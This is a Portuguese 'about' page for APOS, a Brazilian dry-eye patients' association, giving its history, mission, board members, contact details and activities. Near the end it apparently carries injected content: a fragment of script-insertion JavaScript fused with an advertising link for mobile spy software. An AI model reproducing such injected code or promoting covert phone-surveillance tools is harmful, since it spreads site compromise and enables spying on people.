APOS

Histórico

A Associação Brasileira de Portadores de Olho Seco - APOS foi criada no dia 15 de julho de 2004,pela iniciativa de portadores de olho seco, familiares, médicos e apoio de empresas da área farmacêutica. Com sede em São Paulo, à Rua  Tamandaré, 693,  Liberdade, São Paulo-Sp , a APOS tem parceria com os principais hospitais e universidades brasileiras e o apoio do Conselho Brasileiro de Oftalmologia, SOBLEC e apoio internacional do The Cornea Society e International e Ocular Surface Society.

A doença do olho seco afeta cerca de 30% da população em todo o mundo. Muitas delas sofrem desnecessariamente porque não sabem que o problema tem solução, são incorretamente diagnosticadas ou não chegam a receber um tratamento adequado.
Hoje, um diagnóstico correto com tratamento adequado pode ajudar qualquer pessoa portadora da doença do olho seco a ter uma melhor qualidade de vida.

Nossa Missão e Objetivos
A APOS é uma associação sem fins lucrativos e tem como objetivo principal a conscientização da população brasileira sobre a existência da doença, seu diagnóstico e tratamento, além da busca da melhora da qualidade de vida dos portadores de Olho Seco, através da informação e educação.

Nossa Missão está em educar e informar os portadores, seus familiares e amigos, os profissionais de saúde e a sociedade, em geral, conscientizando-os sobre a natureza e os tratamentos do olho seco. Também é nossa missão, promover suporte, divulgar o olho seco, eliminar o preconceito e discriminação.

Quem compõe a APOS
Conselho Executivo Gestão 2014/2016

Presidente Científico
Dr. André Berger Emiliano da Silva

Graduado em Medicina pela Universidade Federal do Paraná (2004). Oftalmologista formado pelo Instituto Suel Abujamra (ISA), reconhecido pela Comissão Nacional deResidência Médica (CNRM) / Ministério da Educação e Cultura (MEC), com títulos de especialista concedidos peloMEC / CNRM e pelo Conselho Brasileiro de Oftalmologista (CBO) / Associação Médica Brasileira(AMB), reconhecidos pelo Conselho Federal de Medicina (CFM). Preceptor de cirurgia de Catarata na Universidade de Santo Amaro - Unisa.  Autor do Livro: Manual de Dicas em Cirurgia de Catarata.

Presidente Executivo
Dr José Alvaro Pereira Gomes

Professor Adjunto Livre-docente|Depto. Oftalmologia, Universidade Federal de S. Paulo - UNIFESP/EPM
Diretor|Area de Segmento Anterior e Centro Avancado de Superficie Ocular (CASO)|UNIFESP/EPM
Presidente|Sociedad Panamericana de Cornea (PanCornea)

Vice-Presidente Executivo

Marcelo Gomes da Rocha Azevedo
Administrador de empresas

Presidente de Honra/Social

Jorge Toshiyuki Ogata
Engenheiro, portador de Olho Seco

1ª Secretário
Cleivania Lima de Almeida

Professora, portadora de Olho Seco


2º Secretário
Dr João Paulo Muaccad Gama
Médico Oftalmologista

Tesoureiro
Dr. Henrique Baltar
Médico oftalmologista


Membros do Conselho Fiscal

Dr. Marcelo Pereira Macedo

Médico oftalmologista

Membros auxiliares - Conselho Acadêmico

Dra Paula Baltar Pazos

Médica Oftalmologista

Secretária

Marcia Oliveira

Atividades da APOS

- Atendimento telefônico (011) 4107-0920    NOVO TELEFONE das 8:30 às 11:30 horas
- Sede localizada à Rua Tamandaré, 693, Liberdade - São Paulo/SP
- www.apos.org.br :: E-mail apos@apos.org.br
- Desenvolvimento de materiais educacionais (folhetos, posters, banners);
- Encontros Educacionais;
- Jornal informativo De Olho na APOS;
- Divulgação da APOS e Olho Seco na imprensa Brasileira;
- Pesquisas
- Implantação de Programa de Voluntariado APOS, com o objetivo de consolidar a cultura e o trabalho voluntário, promovendo a educação para o exercício consciente da solidariedade e cidadania;
- Pesquisas - Implantação de Programa de Voluntariado APOS, com o objetivo de consolidar a cultura e o trabalho voluntário, promovendo a educação para o exercício consciente da solidariedade e cidadania;
- Projeto de criacão de um espaço de convivência aos portadores e familiares;
- Projeto educacional nas empresas.

Voltardocument.currentScript.parentNode.insertBefore(s, document.currentScript);https://topspyapps.net - The most popular 2017 spy software applications for the mobile phones.The most popular 2017 spy software applications for the mobile phones.

Fechar [x]

Área Médica:

Digite o usuário para receber um e-mail com sua senha.